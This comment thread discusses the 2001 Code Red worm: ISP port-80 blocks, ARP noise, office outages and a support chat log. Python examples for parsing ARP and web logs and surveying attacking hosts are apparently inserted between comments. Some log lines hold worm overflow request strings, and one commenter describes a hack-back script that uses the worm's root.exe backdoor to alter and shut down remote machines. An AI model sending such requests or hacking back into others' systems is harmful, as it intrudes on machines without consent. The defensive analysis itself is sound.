    The light is blinking because of ARP packets. Every time someone tries to connect to a computer on your cable segment, the router sends an ARP request to find out where to send the data (ARP maps IP address to MAC addresses). This is related to Code Red, but it's just a side effect and is not harmful. An ARP packet is typically 60 bytes long, and I'm getting 10-20 every sends, so that's less than 1 kbyte/sec of bandwidth (cable segments have from 25-42 mbit/sec of bandwidth).

    However, I've heard about a new Code Red variant that spoofs ARP packets, overflowing the ARP table in Win98/ME and causing machines to freeze. AFAIK, it doesn't affect other operating systems. It doesn't seem very common either.

    BTW, ARP packets are not IP packets, so you can't stop them with iptables/ipchains or any IP firewall, and they won't appear in your logs. Use a sniffer like Ethereal if you want to see what's going on.

    1. Re:It's ARP packets by Anonymous Coward · · Score: 0
      I'm getting 10-20 every sends

      That should be "every second". That corresponds to 600-1200 per minute, which is a lot, but still doesn't use a lot of bandwidth.

  211. Amazingly annoying by Pedrito · · Score: 4, Informative

    6 of our machines at work got infected over the weekend. I was under the impression that our web guy had been keeping them up-to-date, but 5 were inside our NAT (infected by the 1 that was outside). I was under the impression that the ones inside the NAT would be ok. Bad assumption.

    The bandwidth it used was so bad that it completely wiped out our ability to get out via HTTP. We could ping, get and send mail, but we couldn't browse at all. I had inoculated my home machine, and it wasn't until this morning, when we received a notice from our ISP accusing us of massive port scanning of port 80 that I made the connection. I went around the office and, even after 5 of the 6 machines were inoculated, we still couldn't get out via HTTP. It wasn't until the 6th was inoculated that we could get out.

    Our line is a 768/512 DSL (I believe those are the numbers), and it amazes me that a single machine infected could cause so much trouble. This is pretty disturbing.

  212. REDUNDANT REDUNDANT REDUNDANT by Anonymous Coward · · Score: 0

    THIS POST IS REDUNDANT. MODERATE THIS DOWN. THIS POSTER DESERVES TO LOSE KARMA.


    lowercase lameass lameness filter lowercase lowercase lowercase lowercase lowercase lowercase

  213. Jeeeeez by Shoten · · Score: 2

    Mediaone has closed off port 80 inbound? WHY? The new version of the worm (the person responsible took the shellcode from the first two variants...yes, that's right, "CodeRed II" is really the third iteration) first checks to see if the machine is running a Chinese or Taiwanese version of Win2K. Ah, yes....it only works against Win2K, since that's the only offset it carries. I don't think that people need to take more action towards securing things a good bit better, but this is a reaction that does not consider the nature of the threat.

    --

    For your security, this post has been encrypted with ROT-13, twice.
  214. sure, yea, but by Illserve · · Score: 2

    How many people do this? Standard policy at most places is probably just to install/patch and then assume everything is rosy.

  215. Wrong. YOUR LOCAL COX AFFILIATE bans servers. by Anonymous Coward · · Score: 0

    Here in Las Vegas, Cox Express explicitly allows servers if you buy a static IP address for an extra $10/month. Ah, the advantages of a smaller town where IP addresses are plentiful.

  216. Hilariously Ironic . . . by jgaynor · · Score: 2, Interesting

    The CNN.com story about this makes no mention of AT&T's woes. Wonder Why?

    It because they're one of CNN's biggest sponsors. The online video coverage of the story is even preceded by AT&T commercials :). Now THATS Irony!

    Here's the Video . . .

  217. Re:What ports does the worm attack? by Anonymous Coward · · Score: 0


    Thanks. Do you know of any sites that have further info?

  218. Try aris by Anonymous Coward · · Score: 1, Interesting

    aris.securityfocus.com lets you look at port access trends. dshield.org is a similar, but much less comprehensive, site.

  219. I'm on AT&T Mediaone... by dave-fu · · Score: 1

    And I can vouch for port 80 being blackholed. Around 2:30 last night was the last scan for default.ida on my machine. I've of course since sent the list of chatty boxes to the helpdesk here, but my webserver's still blackholed as is, I imagine, every other one on here. 5 scans a minute is quite enough.
    That said, I haven't gotten so much as a bulk e-mail explaining their actions; it doesn't bother me except that there are inevitably going to be infected users _still_ in the dark about it when the blackhole's lifted.

    --
    Easy does it!
    This comment has been submitted already, 276865 hours , 59 minutes ago. No need to try again.
  220. New variant is a blessing in disguise? by Nonesuch · · Score: 2
    Actually, the new variant may be easier to eradicate than previous versions. The fact that it preferentially scans 'nearby' network address ranges means that the worm will be less widespread, and it should be easier for providers and businesses to detect infected hosts in their network, just by watching for the characteristic overflow attempts in the logs on their various webservers.

    I've already seen at least one site sending out automated 'a host in your network may be infected' notices by putting up a CGI script in place of vulnerable IIS binary, and using the ARIN database to try to guess who controls the network that the attacking host resides in.

    I only received the warning message because it guessed wrong :-)
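The post above makes two points worth checking against real logs: a variant that prefers nearby addresses concentrates the attackers in the victim's own /8 and /16, and that concentration is what makes per-network notification (one notice per network, looked up in ARIN, rather than one per host) workable. The Python below is an added example, not the script the poster saw; the victim address and attacker list are constructed, and the whois/ARIN lookup for the abuse contact is left out, so the output is the list of networks you would look up, not the notices themselves.

```python
import ipaddress
from collections import Counter

# Constructed data: a server at VICTIM and the attacking addresses a log-scraping
# script would extract for it (addresses are made up for the example).
VICTIM = "65.96.70.5"
ATTACKERS = [
    "65.96.70.231", "65.96.71.14", "65.96.70.231", "65.97.3.9",
    "65.12.0.44", "24.219.87.84", "65.96.70.231", "65.200.1.1",
    "66.1.2.3", "65.96.72.100",
]


def locality(victim, attackers):
    """Count distinct attackers that share the victim's /8 and /16. Random scanning
    would put roughly 1/256 of them in the same /8; a worm that prefers nearby
    addresses pushes these counts far above that."""
    v = ipaddress.ip_address(victim)
    uniq = {ipaddress.ip_address(a) for a in attackers}
    return {
        "unique": len(uniq),
        "same_slash8": sum(1 for a in uniq if a.packed[:1] == v.packed[:1]),
        "same_slash16": sum(1 for a in uniq if a.packed[:2] == v.packed[:2]),
    }


def notices(attackers, prefix=16):
    """Group distinct attackers by network so one notice goes per network instead of
    per host. Returns (network, attacking hosts) pairs, busiest network first; the
    prefix length is a stand-in for the allocation boundary whois would give you."""
    nets = Counter()
    for a in set(attackers):
        nets[ipaddress.ip_network(f"{a}/{prefix}", strict=False)] += 1
    return sorted(((str(n), c) for n, c in nets.items()), key=lambda t: (-t[1], t[0]))


if __name__ == "__main__":
    print(locality(VICTIM, ATTACKERS))
    for net, count in notices(ATTACKERS):
        print(f"{net}: {count} infected host(s) -> look up abuse contact, send one notice")
```

With the constructed list, 6 of the 8 distinct attackers sit in the victim's /8 and 3 in its /16, and the /16 grouping collapses ten log hits into six networks to contact. Guessing the owner from a fixed prefix is exactly how the poster ended up with a notice meant for someone else, so a real script should use the allocation boundary from the registry rather than a fixed /16.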

  221. Western Ohio Road Runner Cable... by MattHawk · · Score: 1

    ...was down most of yesterday, and has been having a lot of slowdowns the past few days. Also, the email server went down at the same time yesterday morning; The pop server came back up yesterday evening, though SMTP just came up a couple hours ago. They distributed an email yesterday (pop was up, so we could receive) saying they had Code Red running rampant in our block of IPs and warning everyone with NT and 2000 to fix their systems.

  222. Port 80 blocks and arp flooding by Anonymous Coward · · Score: 0

    I work for a large tech company. They gambled and decided not to patch internally for the reason that we have several thousand Win2k servers. Well they lost that gamble and eventually had to shut off access to port 80 on the whole intranet. Needless to say our internal net was useless today and I am sure the productivity cost them dearly.

    On another note, all the arp requests from the @home network has pretty much rendered the 65.x.x.x network useless right now. I have recorded over 3000 unique IP's (mostly originating from Seattle) with the worm. So in general I am extremely pissed at the idiots who did not patch and the idiots who wrote that crappy IIS software.

    1. Re:Port 80 blocks and arp flooding by Anonymous Coward · · Score: 0
      I'll echo your sentiment...the company I work for had the same problem. Port 80 access down for about 24 hours now I think...

      Absolutely brilliant!

  223. Re:Yes, my local Cox ISP said the arp's are normal by Anonymous Coward · · Score: 0
    Arp requests are used by a machine just coming onto the network to get an address from the DHCP server.

    No, those are BOOTP packets. ARP packets are used any time someone tries to connect to a machine on your cable segments. Generally the router will cache ARP replies, but Code Red could be causing their ARP tables to overflow, making them repeatedly look up the same addresses. Or people may be trying to connect to machines that are turned off. The router never gets an ARP reply, so it keeps sending out requests. Cable segments often have thousands of computers, so it's probably a combination of these things.

    I'm graphing the bandwidth of my modem, and incoming data has been at 6 kbit/sec since this thing started. Cable modems have ~40 mbit/sec of bandwidth, so the ARP packets shouldn't be having much effect on bandwidth. Maybe your ISP's T1/T3/etc. lines are congested with traffic.
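Comments 210 and 223 describe what a sniffer shows on a cable segment: the router's ARP requests for every address somebody tries to reach, repeated when the target never answers, and why an IP-level firewall neither blocks nor logs them. The Python below is an added example, not from either poster. It builds a constructed capture (not a real trace) of minimum-size Ethernet frames as a raw socket or pcap would hand them over, parses the Ethernet and ARP headers, and reports the request rate, the targets that never replied, and the bandwidth the requests take using the 60-byte frame size the post assumes.

```python
import struct
import ipaddress
from collections import Counter

ETH_P_ARP = 0x0806
ARP_FMT = "!HHBBH6s4s6s4s"  # htype, ptype, hlen, plen, oper, sha, spa, tha, tpa (28 bytes)


def build_arp(sender_mac, sender_ip, target_ip, oper=1, target_mac=b"\x00" * 6):
    """Build one Ethernet+ARP frame (1 = request, 2 = reply), padded to the 60-byte
    minimum the way it appears on the wire. Used only to construct the sample capture."""
    dst = b"\xff" * 6 if oper == 1 else target_mac
    eth = dst + sender_mac + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack(ARP_FMT, 1, 0x0800, 6, 4, oper, sender_mac,
                      ipaddress.ip_address(sender_ip).packed,
                      target_mac, ipaddress.ip_address(target_ip).packed)
    frame = eth + arp
    return frame + b"\x00" * (60 - len(frame))


def parse_arp(frame):
    """Return (oper, sender_ip, target_ip) for an IPv4-over-Ethernet ARP frame,
    None for anything else (IP traffic, runts, other ARP flavours)."""
    if len(frame) < 42:
        return None
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = struct.unpack(ARP_FMT, frame[14:42])
    if htype != 1 or ptype != 0x0800 or hlen != 6 or plen != 4:
        return None
    return oper, str(ipaddress.ip_address(spa)), str(ipaddress.ip_address(tpa))


def summarize(frames, seconds):
    """Request rate, targets that were asked for but never answered, and the
    share of the pipe the requests take at 60 bytes each."""
    asked = Counter()
    answered = set()
    n_req = 0
    for f in frames:
        parsed = parse_arp(f)
        if parsed is None:
            continue
        oper, spa, tpa = parsed
        if oper == 1:
            n_req += 1
            asked[tpa] += 1
        elif oper == 2:
            answered.add(spa)
    unanswered = {ip: c for ip, c in asked.items() if ip not in answered}
    return {
        "requests": n_req,
        "unanswered_targets": unanswered,
        "req_per_sec": n_req / seconds,
        "kbit_per_sec": n_req * 60 * 8 / seconds / 1000,
    }


# Constructed two-second capture: the segment router (24.0.0.1) asks for three hosts;
# only 24.0.0.10 is up and replies, so the other two get asked again and again.
ROUTER_MAC = bytes.fromhex("00a0c9000001")
HOST_MAC = bytes.fromhex("0050da000002")
CAPTURE = (
    [build_arp(ROUTER_MAC, "24.0.0.1", "24.0.0.10") for _ in range(10)]
    + [build_arp(HOST_MAC, "24.0.0.10", "24.0.0.1", oper=2, target_mac=ROUTER_MAC)]
    + [build_arp(ROUTER_MAC, "24.0.0.1", "24.0.0.11") for _ in range(15)]
    + [build_arp(ROUTER_MAC, "24.0.0.1", "24.0.0.12") for _ in range(5)]
    # one ordinary IP frame (ethertype 0x0800); an ARP counter must ignore it
    + [ROUTER_MAC + HOST_MAC + struct.pack("!H", 0x0800) + b"\x45" + b"\x00" * 59]
)

if __name__ == "__main__":
    print(summarize(CAPTURE, seconds=2))
```

The constructed capture works out to 15 requests a second and about 7 kbit/s, in the range the two posts report, and the two addresses that never reply account for two thirds of the requests, which is the "machines that are turned off" effect described above. To feed this real frames, read them from a raw AF_PACKET socket or a pcap file; an iptables/ipchains log will never contain them.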

  224. Worm eats massive bandwith by oncee · · Score: 1

    The problem for us Mac users isn't the fear of infection, but the increased use of bandwidth that slowed our access to the Internet at work. I had the experience of trying to do Westlaw.com training on a slow connection today. We finally gave up. I'm glad AT&T took the action it did. It really increased speed this afternoon. I wish my cable modem company would do the same thing. I'm seeing 4 attacks per minute on my machine at home. Each attempt is deflected by my firewall, but it continues to piss me off, and slow my connection. All broadband providers should take the same action for residential users.

  225. Bell Sympatico DSL by AndroidCat · · Score: 1

    I'm seeing a few hits a minute -- mainly from other Sympatico IPs. It's probably a later version of Code Red.

    I'm truly amazed at the number of clueless people running IIS, probably on home machines. (I know, I know: You can never underestimate the intelligence of most users.)

    It'd be tempting to use the Code Red II backdoor to drop a "Hey stupid, your computer is infected!" message on their desktop, but sigh, that would be wrong...

    --
    One line blog. I hear that they're called Twitters now.
  226. Videotron's Warning by Anonymous Coward · · Score: 0

    I think they are very honest.

    ---------

    Dear customer,

    For some time, a worm-type virus called "Code Red", which affects the operating systems Windows NT 4 and 2000 running "Internet Information Server" ("IIS") 4 or 5 services, has been propagating on the Internet. Once installed on these systems, this virus tries to reproduce itself on other computers. With this intention, it carries out a sweeping scan of the Internet in search of other vulnerable servers.

    For users like you, this results in:
    - a ceaseless flickering of the "Receive" LED ("RD" or "RCV").
    - constant logging, in your firewall software, of repeated connection attempts on port 80.

    Apart from these nuisances, these requests do not represent any danger for other operating systems (Windows 95/98/ME, Linux/Unix, etc). Although out of our control, this situation forces us to deploy a good share of efforts and resources in order to counter the network slowdown and the performance drops of our servers.

    For these reasons, we recommend that the concerned users (WinNT4 and 2000) secure their systems by using the tools at their disposal on Microsoft's web site. You can also find a good deal of complementary information concerning this virus.

    Microsoft Security Bulletin MS01-033: http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-033.asp (Patches are available at the bottom of the preceding link)

    We hope that this information will be useful to you. Our technical support center is open seven days a week, twenty-four hours a day. We invite you to visit our web site at http://www.videotron.com where you will find details concerning our products and services.

    Thank you for choosing Vidéotron

    Best regards,
    Bruno Cartier
    Internet residential technical support
    assistance@videotron.ca
    Contact us: http://internet.videotron.ca/contact-us/
    Internet services: http://internet.videotron.ca/en/

  227. IIS really means... by Shingis · · Score: 1

    Insufficient Internet Security

  228. Real damage done to Britain's telephone inquiries by Sara+Chan · · Score: 2
    I live in England. For the last day or so, it has not been possible to get telephone-directory inquiries for Europe or Asia. Asking for numbers in Canada/USA works fine. But when I've tried to get a number in Eurasia, I've been told that there are no lines to directory inquiries in those countries. The cause is claimed to be CodeRed, but I haven't been able to find out the details.

    (Note: calls work fine; it's just directory information that you cannot get.)

  229. Grrrrrr... by whovian · · Score: 1

    > cat default.ida

    <HTML><HEAD><META HTTP-EQUIV="REFRESH" CONTENT="5; URL=http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/topics/codealrt.asp"></head><body bgcolor="ffffff" text="ff0000"><font size="+4"><center>
    YOUR SYSTEM IS INFECTED WITH CODE RED. GO AWAY NOW AND PATCH YOUR SYSTEM PLEASE.
    </center></font></body></html>

    --
    To-do List: Receive telemarketing call during a tornado warning. Check.
    1. Re:Grrrrrr... by Anonymous Coward · · Score: 0

      Wow, I didn't know automated worms had advanced to the point that THEY CAN READ!

    2. Re:Grrrrrr... by Anonymous Coward · · Score: 0

      I think his humor was the redirect to the MS site for getting patched against the virus. It (the redirect) won't help, but it won't hurt either.

  230. someone should make a code red three by vectus · · Score: 1
    and copyright it. then, if anyone patches their computer to prevent it from being infected, the person who made the worm could invoke the DMCA, since they would be circumventing the virus. They could then sue microsoft, and the anti-virus companies, and every corporation running windows NT/2000.

    It'd be a thing of beauty.

  231. Re:My 'Data' Light has been going steady since Fri by rjamestaylor · · Score: 2
    a note to IIS users: /etc/httpd.conf it's not really that hard.
    A note to Linux users: /etc/http.conf does not exist on Windows.
    --
    -- @rjamestaylor on Ello
  232. Comment removed by account_deleted · · Score: 1

    Comment removed based on user account deletion

  233. Wrong move by SnapperHead · · Score: 1

    Instead of blocking off port 80, why not explain to your customers that they need a REAL (secure) OS if they want to run webservers.

    My local cable company outright hates me, because I run Linux. Well, I called them today about the severe speed decrease and they thanked me for not being one of the ones slowing down the entire network. Of course, they still don't like the fact that I am running a webserver. But, there's not much they can do about it. They didn't have a TOS when I signed up. So, I am grandfathered into running whatever I please. Keep in mind, I don't abuse this privilege. Which is why they don't make a big stick about it. I have a VERY low traffic site, which is mostly for my own private use.

    --
    until (succeed) try { again(); }
  234. Comment removed by account_deleted · · Score: 1

    Comment removed based on user account deletion

  235. Re:Speaking of hotmail.. by kfuq · · Score: 1

    I have gotten viruses on my winbox that both McAfee and Norton didn't catch..

    --
    iF yOu WAnT to C YOUr iP agaIn gAThEr tWO MilLIon dOLLArS IN Non - cONsEcuTivE TweNtY's AnD AWaiT FuRThER iNstrUctIoN
  236. Regarding its effect on laser printers. by kaoshin · · Score: 2, Funny
    I had read that it is supposed to hang Hewlett Packard laser printers with web interfaces. We had an issue today where a client's Minolta-QMS laser printer with a web interface was affected in the same manner.

    Hasn't hit any of our servers but I keep getting the w32.sircam worm in my email all day. I reply to them all with easy to comprehend AOL language... "You've got worms."

  237. New payload? by geemon · · Score: 1
    In looking at the web logs, has anyone seen a payload that consists of all A's instead of the X's or N's? In looking at some from a little earlier today I've seen some different requests in my log from the 10.1.*.* domain. They appear as follows...

    10.1.*.* GET /Default.htm

    always immediately followed by

    10.1.*.* (same ip) GET /x.ida

    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...A=X

    1. Re:New payload? by Anonymous Coward · · Score: 0
      If that is all that is after the A's, then it will only crash vulnerable web servers -- no buffer overflow exploit.

      Now that I think about it -- what an excellent way to stop them from scanning?

      Seriously, if you are on a cable modem and are getting scanned from 10.x.x.x nets, then it is probably your cable provider looking for vulnerable servers.

  238. Here's what AT&T (@home) says about it... by bradleyjay · · Score: 1

    I just got off IRC with what I thought was AT&T tech support. Turns out I'm not an AT&T customer anymore. Now I'm an @home customer. Well, actually my checks go to AT&T every month, but I don't have to abide by their AUP even though my official AT&T roadrunner homepage links to their AUP.

    NOOOOOO! I'm bound to @home's AUP, which is on a completely different site. To their credit, the support staff was very polite and professional. Anyway, here are my IRC logs, so you all can see what a joke MediaOne/AT&T/@home really is. I've changed their names to protect the innocent. "Tech" is the original level-1 tech I spoke to, and "Supervisor" is his supervisor.

    Welcome moo2 ...
    Connecting to server. Please wait...
    Connected to athchat03.broadband.att.com
    Tech has joined this session!
    Tech says, Thank you for contacting AT&T Broadband Cable Internet Services. My name is Tech. How may I help you?
    Tech says, You have blocked port 80, correct?
    You say, can you pls unbloc port 80 for my IP?
    You say, yes.
    You say, i am fully patched against codered V1&v2
    Tech says, Unfortunately, the port 80 has been blocked by the broadband engineers as to combat the spread of the code red virus. Sorry for any inconvenience.
    You say, blocked for how long?
    Tech says, That block will be removed by the broadband engineers when the issue with the virus on the network has been solved. There is no ETA given for that removal. Sorry.
    You say, your aup says that if i chose to run an http server, i assume all security risks.
    You say, it does not say that you will block access even though i asert that i assume all risks.
    Tech says, The actual use of a personal web server does violate the terms and service agreement. We cannot individually remove the blocks for computers. Sorry for that.
    You say, where in the aup does it say that?
    Tech says, The use of a personal web server is against the terms of service agreement. It is one reason why we do not support Windows 2000 server and only Windows 2000 professional.
    You say, according to your web site, section 9b says "If Customer chooses to run such applications, Customer should take the appropriate security measures"
    You say, again, where in the aup does it say that?
    Tech says, This information is recorded in our @home policies pages. I will see if I can get that information for you.
    You say, pls do...if it differs from the aup posted on the website, there;s gonna be a problem.
    Tech says, I will send you this page in one moment.
    Tech pushes page, http://www.home.com/aup
    You say, i am an att customer, not @home...if @home has dift policies than att, it was up to them to inform me when the 2 merged. is i can talk to about this?
    Tech says, I have inquired about your information. The block on port 80 will not be lifted any time soon. If you wish to talk to a supervisor, I can arrange that for you.
    You say, pls do...i was unaware that i am now an @home customer. while my home page has changed to excite@home, clicking on the 'member services' link or the 'help' link, the 2 places you'd expect to find an aup, i'm redirected back to at&t's site.
    Tech says, I will need some information from you first.
    Tech says, May I have your first and last name, and your current phone number with the area code please?
    You say, xxxx xxxxxx xxx-xxx-xxxx
    Tech says, May I also get your complete mailing address with the city, state and zip code please?
    You say, 9999 nw 99 st. #999, anytown fl, 99999
    Tech says, Thank you for that information. I will get a supervisor for you in one moment.
    You say, thanks
    Tech says, I am transferring you in one moment. The supervisor's name is Supervisor.
    You say, ok thanks tech
    You are being transferred to another Agent. Please stand by...
    Tech has left this session!
    Supervisor has joined this session!
    Supervisor says, Thank you for contacting AT&T Broadband Internet Services, I am a supervisor and my name is Supervisor, How can I help you today?
    You say, did Tech explain the situation to you?
    Supervisor says, Yes, your are requesting port 80 be unblocked?
    You say, yes, pls
    Supervisor says, That is not possible at this time I apologize.
    You say, ok...i understand tat you are blocking to halt codered, which is acceptable since i'm not running any commercial site...
    Supervisor says, Provision 10.9 on the user agreement is the section you should refer too.
    Supervisor says, That is correct.
    You say, but i'd like to know why i'm being subjected to @home's aup when i'm an att customer
    Supervisor says, Actually the section I quoted is on the Road Runner agreement.
    You say, can you give me a url pls?
    Supervisor says, @Home and ATRunner are in the process of merging.
    You say, well according to the att aup, which is the only aup i'm bound to right now, "This Agreement represents the complete agreement concerning this license and may be amended only by a writing executed by both parties. "
    You say, http://help.broadband.att.com/subagreelease.jsp 10.9
    Supervisor says, Did you receive are email regarding the issue?
    You say, srry, it's 11.9
    You say, no
    You say, the only email was about a rate increase
    Supervisor says, One moment locating the link for your user agreement.
    You say, thx
    Supervisor pushes page, http://help.broadband.att.com/faq.jsp?content_id=354&category_id=3
    Supervisor says, You should have it in front of you right now.
    Supervisor says, 10.9 is applicable in this instance.
    You say, ok...understood...but you have to admit that it conflicts with http://help.broadband.att.com/subagreelease.jsp 9b, which says in reference to http servers "If Customer chooses to run such applications, Customer should take the appropriate security..
    You say, measures."
    Supervisor says, That is correct. However you are former mediaone customer and our governed under the old agreement.
    You say, the old agreement is the one you just sent me?
    Supervisor says, Correct. That is the agreement you would have signed.
    You say, i'll have to dig through my papers, but i doubt it.
    You say, anyway, on a more friendly note, are the codered hits letting up at all yet?
    Supervisor says, If you have any further questions please refer to AT&T Legal demands at http://help.broadband.att.com/legal regarding any challenges.
    Supervisor says, Yes the implementation of the filters is causing it to let up.
    Supervisor says, I apologize for us having to take the action we did.
    You say, no, i mean inbound to your routers...
    You say, we saw a drastic DECREASE at my work today..sounds like ppl are patching their systems.
    Supervisor says, It was beginning to bring down the stability of our network and we had to take action.
    Supervisor says, That may be the case or it may be the filters we put in place.
    Supervisor says, I cannot say at this time.
    Supervisor says, We are in the process of contacting the affected customers at this time.
    You say, well thanks for the info...and i'm gonna do some more research. if i have any problems i'll refer to the last url you gave.
    You say, is there a phone number for your legal dept?
    Supervisor says, Your welcome. Legal Demands Center 183 Inverness Drive West Suite 100-N Englewood, Colorado 80112 Phone: 800-871-6298
    You say, ok thanks again for the info, and thanks for being so professional about this matter.
    You say, g'nite.
    Supervisor says, It's been a pleasure chatting with you. Thank you for using AT&T Broadband Cable Internet Service and have a good day.
    You say, you too.
    The session has ended

    --
    Karma...what's that? I just speak my mind.
  239. Re:My 'Data' Light has been going steady since Fri by XMyth · · Score: 1

    Seems like you're implying that IIS costs money...which it does not. The OSes it runs on do however...that might have been what you were implying but it seemed otherwise to me.

  240. Bring them to justice by WildBeast · · Score: 1

    Shouldn't we instead focus on finding the authors and bringing them to justice?

    1. Re:Bring them to justice by szomb · · Score: 1

      Is it illegal to write software like Code Red?

      If one authors such a virus and simply puts the source on his/her web page with no precompiled binaries, and WITHOUT INFECTING ANY SYSTEMS HERSELF... are there legal sanctions?

      --
      Just because a few of us can read write and do a little math, doesn't mean we deserve to conquer the universe
    2. Re:Bring them to justice by Anonymous Coward · · Score: 0

      Maybe it's impossible to find the authors. What's plan B?

    3. Re:Bring them to justice by szomb · · Score: 1

      How do you know the author of the virus is the person who spread it?

      Like I said, if someone publishes the source code and lets someone else do the spreading, who's illegal? Both, the author, or the distributor?

      --
      Just because a few of us can read write and do a little math, doesn't mean we deserve to conquer the universe
  241. Small util for Windows to listen on port 80? by synthe · · Score: 1

    Has anyone written a small daemon that runs on win32 to listen to incoming requests on port 80 (or any configurable port) and just log the IP and string sent by the remote computer? I would like to have something like that to see how many times my windows box has been hit, even though it's not vulnerable, and especially I'd love to install it on my work computer to see if code red is floating around the corporate network at all.

    1. Re:Small util for Windows to listen on port 80? by szomb · · Score: 1

      You've heard of Perl, right?

      Heck, netcat should work on Windows. See also CYGWIN.

      --
      Just because a few of us can read write and do a little math, doesn't mean we deserve to conquer the universe
    2. Re:Small util for Windows to listen on port 80? by strags · · Score: 1

      Try this.

      I just wrote it REALLY fast (which is why the code is so ugly), so I haven't tested it too thoroughly (ie. in the wild), but it looks like it oughta work.

      Naturally, I expressly disclaim all responsibility for anything bad that happens should you choose to use this program.

    3. Re:Small util for Windows to listen on port 80? by gamorck · · Score: 0

      Yeah I wrote something - its a set of scripts that work with IIS. I have a web app that will parse through IIS logs and dump a report back to you with a nice little graph.

      I've developed a script - though it's not fully functioning yet outside my test environment - that will detect a Code Red attack and immediately strike back by using root.exe to upload several files using tftp.

      These files are used in an attempt to automatically patch the server and remove the security holes left by Code Red.

      Unfortunately it has yet to actually succeed over the web. Most of the attackers seem to experience problems when it comes to shutting down. My defense routines automatically try two different ways of shutting down the remote machines (both of which work in my internal network between different machines) - but I can't quite get them to work on the machines on the web.

      It may be because of the increased security of NTFS. As my routines are only designed to work with security-lax FAT formatted systems - that may be part of it.

      Anyway - Code Red is only getting worse. I've had over 2100 attack attempts since saturday. Day by day the daily number is increasing (600 today alone). This has got to stop....

      Gam
      "Flame at Will"

      --
      I love idealists not because I am one, but because they make life bearable for pragmatists such as myself.
    4. Re:Small util for Windows to listen on port 80? by Anonymous Coward · · Score: 0

      Install a firewall like zonealarm, and you'll see the attempts to connect.

  242. small survey by 1010011010 · · Score: 5, Informative

    I ran a test on the 1597 unique hosts that have attempted to infect my web server recently.

    321- 20.1% - "Under Construction" default blank page
    0- 00.0% - "too busy"
    1093- 69.4% - cannot connect
    183- 11.4% - some web page

    --
    Napster-to-go says "Fill and refill your compatible MP3 player", which is a lie. It's not MP3. It's WMA with DRM.
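1010011010's survey above (242) is easy to repeat against your own access log: take the distinct source IPs of the `*.ida` requests, connect back to each on port 80, and bucket what comes back. This is an added example written for this page, not the poster's script. The log lines are constructed in Apache common-log style with documentation-range addresses; the `too busy` bucket is keyed on a 503 status or the words "too busy" in the body, which is an assumption about what the poster counted, and `fetch_root` is injectable so the tally can be checked without the network. Connecting back to 1,500 hosts is an active scan of other people's machines; keep it to hosts that actually hit you and stay inside your provider's AUP, which, as the rest of this thread shows, may be narrower than you think. A large "cannot connect" share is also expected on cable networks: dynamic addresses move, and at the time of this thread several providers were filtering port 80 inbound.

```python
"""Reproduce the 'small survey': distinct source IPs of *.ida requests from an
Apache-style access log, a connect-back to each on port 80, and a tally."""
import re
import socket
from collections import Counter

# common log format: ip ident user [time] "METHOD path HTTP/x" status bytes
IDA_HIT = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET /\S*\.ida\?', re.IGNORECASE)

BUCKETS = ("default page", "too busy", "cannot connect", "some web page")


def unique_attackers(log_text: str) -> list:
    """Distinct client IPs that requested a *.ida URL, in first-seen order."""
    seen = {}
    for line in log_text.splitlines():
        m = IDA_HIT.match(line)
        if m:
            seen.setdefault(m.group(1), True)
    return list(seen)


def fetch_root(host: str, timeout: float = 5.0) -> tuple:
    """HTTP/1.0 GET / over a raw socket. Returns (status, body); status is None
    when no connection could be made and 0 when the reply was not HTTP."""
    try:
        with socket.create_connection((host, 80), timeout=timeout) as s:
            s.sendall(b"GET / HTTP/1.0\r\nHost: " + host.encode("ascii") +
                      b"\r\nConnection: close\r\n\r\n")
            data = b""
            while len(data) < 65536:          # cap what we keep; the default page is tiny
                chunk = s.recv(4096)
                if not chunk:
                    break
                data += chunk
    except (OSError, UnicodeEncodeError):
        return None, b""
    head, _, body = data.partition(b"\r\n\r\n")
    parts = head.split(None, 2)
    try:
        status = int(parts[1]) if parts and parts[0].startswith(b"HTTP/") else 0
    except (IndexError, ValueError):
        status = 0
    return status, body


def classify_response(status, body: bytes) -> str:
    """Bucket a reply the way the survey did. 'too busy' is keyed on a 503 or
    the words 'too busy' in the body (an assumption about what was counted)."""
    if status is None:
        return "cannot connect"
    low = body.lower()
    if status == 503 or b"too busy" in low:
        return "too busy"
    if b"under construction" in low:        # IIS placeholder page: nobody set this server up on purpose
        return "default page"
    return "some web page"


def survey(hosts, fetch=fetch_root) -> Counter:
    """fetch is injectable so the tally can be checked without touching the network."""
    return Counter(classify_response(*fetch(h)) for h in hosts)


def report(counts: Counter, total: int) -> str:
    def pct(n):
        return (100.0 * n / total) if total else 0.0
    return "\n".join(f"{counts.get(b, 0):5d} - {pct(counts.get(b, 0)):5.1f}% - {b}"
                     for b in BUCKETS)


# Constructed sample log (documentation-range addresses), not a real capture.
SAMPLE_LOG = """\
192.0.2.10 - - [08/Aug/2001:06:00:49 -0400] "GET /default.ida?XXXXXXXX%u9090%u6858=a HTTP/1.0" 404 0
192.0.2.10 - - [08/Aug/2001:06:01:12 -0400] "GET /default.ida?XXXXXXXX%u9090%u6858=a HTTP/1.0" 404 0
198.51.100.7 - - [08/Aug/2001:06:02:03 -0400] "GET /default.ida?NNNNNNNN%u9090%u6858=a HTTP/1.0" 404 0
203.0.113.5 - - [08/Aug/2001:06:02:30 -0400] "GET /index.html HTTP/1.1" 200 1043
"""

if __name__ == "__main__":
    with open("access_log", encoding="ascii", errors="replace") as f:
        hosts = unique_attackers(f.read())
    print(report(survey(hosts), len(hosts)))
```

The interesting bucket is "default page": those are machines whose owners never meant to run a web server at all, which is exactly the population a port-80 block punishes least and a targeted scan-and-notify from the provider would reach best.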
  243. filtering inbound http requests by glob · · Score: 1

    where i work we have to put iis boxes on the net. i don't like this, so i've written a program that runs on your firewall and filters inbound http requests.

    "patching" all our iis boxes for codered took me approx 30 seconds :)

    http://glob.com.au/http_filter/

    freeware.

    --
    nostrils
  244. @home network busy spreading worm by SirAnodos · · Score: 1

    Here is a 20 minute segment from my router's logs:

    -00:39:39 Unrecognized access from 24.252.126.24:4409 to TCP port 80
    -00:36:36 Unrecognized access from 24.252.165.173:2976 to TCP port 80
    -00:36:33 Unrecognized access from 24.252.165.173:2976 to TCP port 80
